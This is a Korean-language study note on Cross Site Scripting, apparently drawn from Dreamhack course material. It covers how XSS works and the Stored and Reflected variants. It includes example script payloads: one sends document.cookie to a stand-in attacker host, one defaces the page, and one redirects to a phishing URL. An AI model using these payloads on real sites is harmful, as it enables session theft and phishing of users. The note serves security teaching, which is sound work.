XSS(Cross Site Scripting)
공격자가 입력한 악성스크립트가 사용자 측에서 응답하는 취약점이다.
공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고, 임의의 기능을 수행하는 등의 공격을 진행할 수 있다.
이는 이용자가 삽입한 내용을 출력하는 기능에서 발생한다.
클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고, 서버로부터 받은 응답(HTML, CSS, JS 등의 웹 리소스)를 시각화하여 이용자에게 보여준다.
이런 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.
공격자가 자바스크립트를 통해 웹 페이지를 조작 가능한 이유?
- 이용자를 식별하기 위한 세션 및 쿠키가 웹 브라우저에 저장되어 있기 떄문에!
XSS 스크립트 예시
1. 쿠키 및 세션 탈취 공격 코드
<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>
2. 페이지 변조 공격 코드
<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>
3. 위치 이동 공격 코드
<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing";
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>Stroed XSS
서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성스크립트를 조회할 때 발생하는 XSS이다.
대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다.
Reflected XSS
서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다.
대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서, 스크립트를 포함해 검색하는 방식이다.
Stored XSS와 다르게 URL과 같은 이용자의 요청에 의해 발생하기 때문에, 공격을 위해 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 한다.
출처
https://learn.dreamhack.io/173
https://www.fis.kr/ko/major_biz/cyber_safety_oper/attack_info/security_news?articleSeq=3408
